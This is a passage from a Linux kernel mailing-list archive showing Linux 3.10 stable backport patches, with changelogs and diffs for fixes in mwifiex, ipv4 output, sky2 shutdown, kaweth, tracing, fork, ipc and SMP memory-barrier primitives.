'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx

Fixes: 5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/mwifiex/cfg80211.c | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c
index e7f7cdf..fa0e45b 100644
--- a/drivers/net/wireless/mwifiex/cfg80211.c
+++ b/drivers/net/wireless/mwifiex/cfg80211.c
@@ -1633,8 +1633,9 @@ done:
 			is_scanning_required = 1;
 		} else {
 			dev_dbg(priv->adapter->dev,
-				"info: trying to associate to '%s' bssid %pM\n",
-				(char *) req_ssid.ssid, bss->bssid);
+				"info: trying to associate to '%.*s' bssid %pM\n",
+				req_ssid.ssid_len, (char *)req_ssid.ssid,
+				bss->bssid);
 			memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN);
 			break;
 		}
@@ -1675,8 +1676,8 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev,
 		return -EINVAL;
 	}
 
-	wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n",
-		  (char *) sme->ssid, sme->bssid);
+	wiphy_dbg(wiphy, "info: Trying to associate to %.*s and bssid %pM\n",
+		  (int)sme->ssid_len, (char *)sme->ssid, sme->bssid);
 
 	ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid,
 				     priv->bss_mode, sme->channel, sme, 0);
@@ -1799,8 +1800,8 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev,
 		goto done;
 	}
 
-	wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n",
-		  (char *) params->ssid, params->bssid);
+	wiphy_dbg(wiphy, "info: trying to join to %.*s and bssid %pM\n",
+		  params->ssid_len, (char *)params->ssid, params->bssid);
 
 	mwifiex_set_ibss_params(priv, params);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (168 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
                   ` (48 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eli Cooper, David S . Miller, Willy Tarreau

From: Eli Cooper <elicooper@gmx.com>

commit f4180439109aa720774baafdd798b3234ab1a0d2 upstream.

When xfrm is applied to TSO/GSO packets, it follows this path:

    xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()

where skb_gso_segment() relies on skb->protocol to function properly.

This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.

Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/ip_output.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index 57e7450..5f077ef 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -97,6 +97,9 @@ int __ip_local_out(struct sk_buff *skb)
 
 	iph->tot_len = htons(skb->len);
 	ip_send_check(iph);
+
+	skb->protocol = htons(ETH_P_IP);
+
 	return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, skb, NULL,
 		       skb_dst(skb)->dev, dst_output);
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 271/319] net: sky2: Fix shutdown crash
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (169 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
                   ` (47 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jeremy Linton, David S . Miller, Willy Tarreau

From: Jeremy Linton <jeremy.linton@arm.com>

commit 06ba3b2133dc203e1e9bc36cee7f0839b79a9e8b upstream.

The sky2 frequently crashes during machine shutdown with:

sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50

This is caused by the sky2 being called after it has been shutdown.
A previous thread about this can be found here:

https://lkml.org/lkml/2016/4/12/410

An alternative fix is to assure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what the
bnx2/tg3/xgene and maybe others are doing to assure that the driver
isn't being called following _shutdown().

Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/ethernet/marvell/sky2.c | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/drivers/net/ethernet/marvell/sky2.c b/drivers/net/ethernet/marvell/sky2.c
index d175bbd..4ac9dfd 100644
--- a/drivers/net/ethernet/marvell/sky2.c
+++ b/drivers/net/ethernet/marvell/sky2.c
@@ -5197,6 +5197,19 @@ static SIMPLE_DEV_PM_OPS(sky2_pm_ops, sky2_suspend, sky2_resume);
 
 static void sky2_shutdown(struct pci_dev *pdev)
 {
+	struct sky2_hw *hw = pci_get_drvdata(pdev);
+	int port;
+
+	for (port = 0; port < hw->ports; port++) {
+		struct net_device *ndev = hw->dev[port];
+
+		rtnl_lock();
+		if (netif_running(ndev)) {
+			dev_close(ndev);
+			netif_device_detach(ndev);
+		}
+		rtnl_unlock();
+	}
 	sky2_suspend(&pdev->dev);
 	pci_wake_from_d3(pdev, device_may_wakeup(&pdev->dev));
 	pci_set_power_state(pdev, PCI_D3hot);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 272/319] kaweth: fix firmware download
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (170 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
                   ` (46 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Oliver Neukum, David S . Miller, Willy Tarreau

From: Oliver Neukum <oneukum@suse.com>

commit 60bcabd080f53561efa9288be45c128feda1a8bb upstream.

This fixes the oops discovered by the Umap2 project and Alan Stern.
The intf member needs to be set before the firmware is downloaded.

Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/usb/kaweth.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/net/usb/kaweth.c b/drivers/net/usb/kaweth.c
index afb117c..8ba774d 100644
--- a/drivers/net/usb/kaweth.c
+++ b/drivers/net/usb/kaweth.c
@@ -1031,6 +1031,7 @@ static int kaweth_probe(
 	kaweth = netdev_priv(netdev);
 	kaweth->dev = udev;
 	kaweth->net = netdev;
+	kaweth->intf = intf;
 
 	spin_lock_init(&kaweth->device_lock);
 	init_waitqueue_head(&kaweth->term_wait);
@@ -1141,8 +1142,6 @@ err_fw:
 
 	dev_dbg(dev, "Initializing net device.\n");
 
-	kaweth->intf = intf;
-
 	kaweth->tx_urb = usb_alloc_urb(0, GFP_KERNEL);
 	if (!kaweth->tx_urb)
 		goto err_free_netdev;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (171 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
                   ` (45 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Steven Rostedt (Red Hat), Willy Tarreau

From: "Steven Rostedt (Red Hat)" <rostedt@goodmis.org>

commit 1245800c0f96eb6ebb368593e251d66c01e61022 upstream.

The iter->seq can be reset outside the protection of the mutex. So can
reading of user data. Move the mutex up to the beginning of the function.

Fixes: d7350c3f45694 ("tracing/core: make the read callbacks reentrants")
Reported-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/trace/trace.c | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
index 4ff36f7..d6e7252 100644
--- a/kernel/trace/trace.c
+++ b/kernel/trace/trace.c
@@ -4121,13 +4121,6 @@ tracing_read_pipe(struct file *filp, char __user *ubuf,
 	struct trace_array *tr = iter->tr;
 	ssize_t sret;
 
-	/* return any leftover data */
-	sret = trace_seq_to_user(&iter->seq, ubuf, cnt);
-	if (sret != -EBUSY)
-		return sret;
-
-	trace_seq_init(&iter->seq);
-
 	/* copy the tracer to avoid using a global lock all around */
 	mutex_lock(&trace_types_lock);
 	if (unlikely(iter->trace->name != tr->current_trace->name))
@@ -4140,6 +4133,14 @@ tracing_read_pipe(struct file *filp, char __user *ubuf,
 	 * is protected.
 	 */
 	mutex_lock(&iter->mutex);
+
+	/* return any leftover data */
+	sret = trace_seq_to_user(&iter->seq, ubuf, cnt);
+	if (sret != -EBUSY)
+		goto out;
+
+	trace_seq_init(&iter->seq);
+
 	if (iter->trace->read) {
 		sret = iter->trace->read(iter, filp, ubuf, cnt, ppos);
 		if (sret)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (172 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
                   ` (44 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michal Hocko, Roland McGrath, Andreas Schwab, Andrew Morton,
	Linus Torvalds, Willy Tarreau

From: Michal Hocko <mhocko@suse.com>

commit 735f2770a770156100f534646158cb58cb8b2939 upstream.

Commit fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted.  Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).

The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):

: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls.  This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping.  This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.

The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for.  It
seems that limitting the scope of the check to core dumping should work
for SIGSEGV issue describe above.

[Changelog partly based on Andreas' description]
Fixes: fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Tested-by: William Preston <wpreston@suse.com>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Roland McGrath <roland@hack.frob.com>
Cc: Andreas Schwab <schwab@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/fork.c | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/kernel/fork.c b/kernel/fork.c
index 2358bd4..612e78d 100644
--- a/kernel/fork.c
+++ b/kernel/fork.c
@@ -775,14 +775,12 @@ void mm_release(struct task_struct *tsk, struct mm_struct *mm)
 	deactivate_mm(tsk, mm);
 
 	/*
-	 * If we're exiting normally, clear a user-space tid field if
-	 * requested.  We leave this alone when dying by signal, to leave
-	 * the value intact in a core dump, and to save the unnecessary
-	 * trouble, say, a killed vfork parent shouldn't touch this mm.
-	 * Userland only wants this done for a sys_exit.
+	 * Signal userspace if we're not exiting with a core dump
+	 * because we want to leave the value intact for debugging
+	 * purposes.
 	 */
 	if (tsk->clear_child_tid) {
-		if (!(tsk->flags & PF_SIGNALED) &&
+		if (!(tsk->signal->flags & SIGNAL_GROUP_COREDUMP) &&
 		    atomic_read(&mm->mm_users) > 1) {
 			/*
 			 * We don't check the error code - if userspace has
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (173 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:49   ` Joe Perches
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
                   ` (43 subsequent siblings)
  218 siblings, 2 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joe Perches, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Joe Perches <joe@perches.com>

commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

The seq_printf return value, because it's frequently misused,
will eventually be converted to void.

See: commit 1f33c41c03da ("seq_file: Rename seq_overflow() to
     seq_has_overflowed() and make public")

Signed-off-by: Joe Perches <joe@perches.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 ipc/msg.c  | 34 ++++++++++++++++++----------------
 ipc/sem.c  | 26 ++++++++++++++------------
 ipc/shm.c  | 42 ++++++++++++++++++++++--------------------
 ipc/util.c |  6 ++++--
 4 files changed, 58 insertions(+), 50 deletions(-)

diff --git a/ipc/msg.c b/ipc/msg.c
index 32aaaab..9ce27d8 100644
--- a/ipc/msg.c
+++ b/ipc/msg.c
@@ -1046,21 +1046,23 @@ static int sysvipc_msg_proc_show(struct seq_file *s, void *it)
 	struct user_namespace *user_ns = seq_user_ns(s);
 	struct msg_queue *msq = it;
 
-	return seq_printf(s,
-			"%10d %10d  %4o  %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
-			msq->q_perm.key,
-			msq->q_perm.id,
-			msq->q_perm.mode,
-			msq->q_cbytes,
-			msq->q_qnum,
-			msq->q_lspid,
-			msq->q_lrpid,
-			from_kuid_munged(user_ns, msq->q_perm.uid),
-			from_kgid_munged(user_ns, msq->q_perm.gid),
-			from_kuid_munged(user_ns, msq->q_perm.cuid),
-			from_kgid_munged(user_ns, msq->q_perm.cgid),
-			msq->q_stime,
-			msq->q_rtime,
-			msq->q_ctime);
+	seq_printf(s,
+		   "%10d %10d  %4o  %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
+		   msq->q_perm.key,
+		   msq->q_perm.id,
+		   msq->q_perm.mode,
+		   msq->q_cbytes,
+		   msq->q_qnum,
+		   msq->q_lspid,
+		   msq->q_lrpid,
+		   from_kuid_munged(user_ns, msq->q_perm.uid),
+		   from_kgid_munged(user_ns, msq->q_perm.gid),
+		   from_kuid_munged(user_ns, msq->q_perm.cuid),
+		   from_kgid_munged(user_ns, msq->q_perm.cgid),
+		   msq->q_stime,
+		   msq->q_rtime,
+		   msq->q_ctime);
+
+	return 0;
 }
 #endif
diff --git a/ipc/sem.c b/ipc/sem.c
index 47a1519..57242be 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -2172,17 +2172,19 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 
 	sem_otime = get_semotime(sma);
 
-	return seq_printf(s,
-			  "%10d %10d  %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
-			  sma->sem_perm.key,
-			  sma->sem_perm.id,
-			  sma->sem_perm.mode,
-			  sma->sem_nsems,
-			  from_kuid_munged(user_ns, sma->sem_perm.uid),
-			  from_kgid_munged(user_ns, sma->sem_perm.gid),
-			  from_kuid_munged(user_ns, sma->sem_perm.cuid),
-			  from_kgid_munged(user_ns, sma->sem_perm.cgid),
-			  sem_otime,
-			  sma->sem_ctime);
+	seq_printf(s,
+		   "%10d %10d  %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
+		   sma->sem_perm.key,
+		   sma->sem_perm.id,
+		   sma->sem_perm.mode,
+		   sma->sem_nsems,
+		   from_kuid_munged(user_ns, sma->sem_perm.uid),
+		   from_kgid_munged(user_ns, sma->sem_perm.gid),
+		   from_kuid_munged(user_ns, sma->sem_perm.cuid),
+		   from_kgid_munged(user_ns, sma->sem_perm.cgid),
+		   sem_otime,
+		   sma->sem_ctime);
+
+	return 0;
 }
 #endif
diff --git a/ipc/shm.c b/ipc/shm.c
index 08b14f6..1f141c9 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -1331,25 +1331,27 @@ static int sysvipc_shm_proc_show(struct seq_file *s, void *it)
 #define SIZE_SPEC "%21lu"
 #endif
 
-	return seq_printf(s,
-			  "%10d %10d  %4o " SIZE_SPEC " %5u %5u  "
-			  "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
-			  SIZE_SPEC " " SIZE_SPEC "\n",
-			  shp->shm_perm.key,
-			  shp->shm_perm.id,
-			  shp->shm_perm.mode,
-			  shp->shm_segsz,
-			  shp->shm_cprid,
-			  shp->shm_lprid,
-			  shp->shm_nattch,
-			  from_kuid_munged(user_ns, shp->shm_perm.uid),
-			  from_kgid_munged(user_ns, shp->shm_perm.gid),
-			  from_kuid_munged(user_ns, shp->shm_perm.cuid),
-			  from_kgid_munged(user_ns, shp->shm_perm.cgid),
-			  shp->shm_atim,
-			  shp->shm_dtim,
-			  shp->shm_ctim,
-			  rss * PAGE_SIZE,
-			  swp * PAGE_SIZE);
+	seq_printf(s,
+		   "%10d %10d  %4o " SIZE_SPEC " %5u %5u  "
+		   "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
+		   SIZE_SPEC " " SIZE_SPEC "\n",
+		   shp->shm_perm.key,
+		   shp->shm_perm.id,
+		   shp->shm_perm.mode,
+		   shp->shm_segsz,
+		   shp->shm_cprid,
+		   shp->shm_lprid,
+		   shp->shm_nattch,
+		   from_kuid_munged(user_ns, shp->shm_perm.uid),
+		   from_kgid_munged(user_ns, shp->shm_perm.gid),
+		   from_kuid_munged(user_ns, shp->shm_perm.cuid),
+		   from_kgid_munged(user_ns, shp->shm_perm.cgid),
+		   shp->shm_atim,
+		   shp->shm_dtim,
+		   shp->shm_ctim,
+		   rss * PAGE_SIZE,
+		   swp * PAGE_SIZE);
+
+	return 0;
 }
 #endif
diff --git a/ipc/util.c b/ipc/util.c
index 7353425..cc10689 100644
--- a/ipc/util.c
+++ b/ipc/util.c
@@ -904,8 +904,10 @@ static int sysvipc_proc_show(struct seq_file *s, void *it)
 	struct ipc_proc_iter *iter = s->private;
 	struct ipc_proc_iface *iface = iter->iface;
 
-	if (it == SEQ_START_TOKEN)
-		return seq_puts(s, iface->header);
+	if (it == SEQ_START_TOKEN) {
+		seq_puts(s, iface->header);
+		return 0;
+	}
 
 	return iface->show(s, it);
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (174 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
                   ` (42 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Benjamin Herrenschmidt, Frederic Weisbecker,
	Mathieu Desnoyers, Michael Ellerman, Michael Neuling,
	Russell King, Geert Uytterhoeven, Heiko Carstens, Linus Torvalds,
	Martin Schwidefsky, Victor Kaplansky, Tony Luck, Oleg Nesterov,
	Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

A number of situations currently require the heavyweight smp_mb(),
even though there is no need to order prior stores against later
loads.  Many architectures have much cheaper ways to handle these
situations, but the Linux kernel currently has no portable way
to make use of them.

This commit therefore supplies smp_load_acquire() and
smp_store_release() to remedy this situation.  The new
smp_load_acquire() primitive orders the specified load against
any subsequent reads or writes, while the new smp_store_release()
primitive orders the specifed store against any prior reads or
writes.  These primitives allow array-based circular FIFOs to be
implemented without an smp_mb(), and also allow a theoretical
hole in rcu_assign_pointer() to be closed at no additional
expense on most architectures.

In addition, the RCU experience transitioning from explicit
smp_read_barrier_depends() and smp_wmb() to rcu_dereference()
and rcu_assign_pointer(), respectively resulted in substantial
improvements in readability.  It therefore seems likely that
replacing other explicit barriers with smp_load_acquire() and
smp_store_release() will provide similar benefits.  It appears
that roughly half of the explicit barriers in core kernel code
might be so replaced.

[Changelog by PaulMck]

Reviewed-by: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
Signed-off-by: Peter Zijlstra <peterz@infradead.org>
Acked-by: Will Deacon <will.deacon@arm.com>
Cc: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: Mathieu Desnoyers <mathieu.desnoyers@polymtl.ca>
Cc: Michael Ellerman <michael@ellerman.id.au>
Cc: Michael Neuling <mikey@neuling.org>
Cc: Russell King <linux@arm.linux.org.uk>
Cc: Geert Uytterhoeven <geert@linux-m68k.org>
Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
Cc: Victor Kaplansky <VICTORK@il.ibm.com>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Oleg Nesterov <oleg@redhat.com>
Link: http://lkml.kernel.org/r/20131213150640.908486364@infradead.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: only backported to support next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/arm/include/asm/barrier.h      | 15 +++++++++++
 arch/arm64/include/asm/barrier.h    | 50 +++++++++++++++++++++++++++++++++++++
 arch/ia64/include/asm/barrier.h     | 23 +++++++++++++++++
 arch/metag/include/asm/barrier.h    | 15 +++++++++++
 arch/mips/include/asm/barrier.h     | 15 +++++++++++
 arch/powerpc/include/asm/barrier.h  | 21 +++++++++++++++-
 arch/s390/include/asm/barrier.h     | 15 +++++++++++
 arch/sparc/include/asm/barrier_64.h | 15 +++++++++++
 arch/x86/include/asm/barrier.h      | 43 ++++++++++++++++++++++++++++++-
 include/asm-generic/barrier.h       | 15 +++++++++++
 include/linux/compiler.h            |  9 +++++++
 11 files changed, 234 insertions(+), 2 deletions(-)

diff --git a/arch/arm/include/asm/barrier.h b/arch/arm/include/asm/barrier.h
index 8dcd9c7..b00ef07 100644
--- a/arch/arm/include/asm/barrier.h
+++ b/arch/arm/include/asm/barrier.h
@@ -59,6 +59,21 @@
 #define smp_wmb()	dmb()
 #endif
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #define read_barrier_depends()		do { } while(0)
 #define smp_read_barrier_depends()	do { } while(0)
 
diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
index d4a6333..78e20ba 100644
--- a/arch/arm64/include/asm/barrier.h
+++ b/arch/arm64/include/asm/barrier.h
@@ -35,10 +35,60 @@
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #else
+
 #define smp_mb()	asm volatile("dmb ish" : : : "memory")
 #define smp_rmb()	asm volatile("dmb ishld" : : : "memory")
 #define smp_wmb()	asm volatile("dmb ishst" : : : "memory")
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	switch (sizeof(*p)) {						\
+	case 4:								\
+		asm volatile ("stlr %w1, %0"				\
+				: "=Q" (*p) : "r" (v) : "memory");	\
+		break;							\
+	case 8:								\
+		asm volatile ("stlr %1, %0"				\
+				: "=Q" (*p) : "r" (v) : "memory");	\
+		break;							\
+	}								\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1;						\
+	compiletime_assert_atomic_type(*p);				\
+	switch (sizeof(*p)) {						\
+	case 4:								\
+		asm volatile ("ldar %w0, %1"				\
+			: "=r" (___p1) : "Q" (*p) : "memory");		\
+		break;							\
+	case 8:								\
+		asm volatile ("ldar %0, %1"				\
+			: "=r" (___p1) : "Q" (*p) : "memory");		\
+		break;							\
+	}								\
+	___p1;								\
+})
+
 #endif
 
 #define read_barrier_depends()		do { } while(0)
diff --git a/arch/ia64/include/asm/barrier.h b/arch/ia64/include/asm/barrier.h
index 60576e0..d0a69aa 100644
--- a/arch/ia64/include/asm/barrier.h
+++ b/arch/ia64/include/asm/barrier.h
@@ -45,14 +45,37 @@
 # define smp_rmb()	rmb()
 # define smp_wmb()	wmb()
 # define smp_read_barrier_depends()	read_barrier_depends()
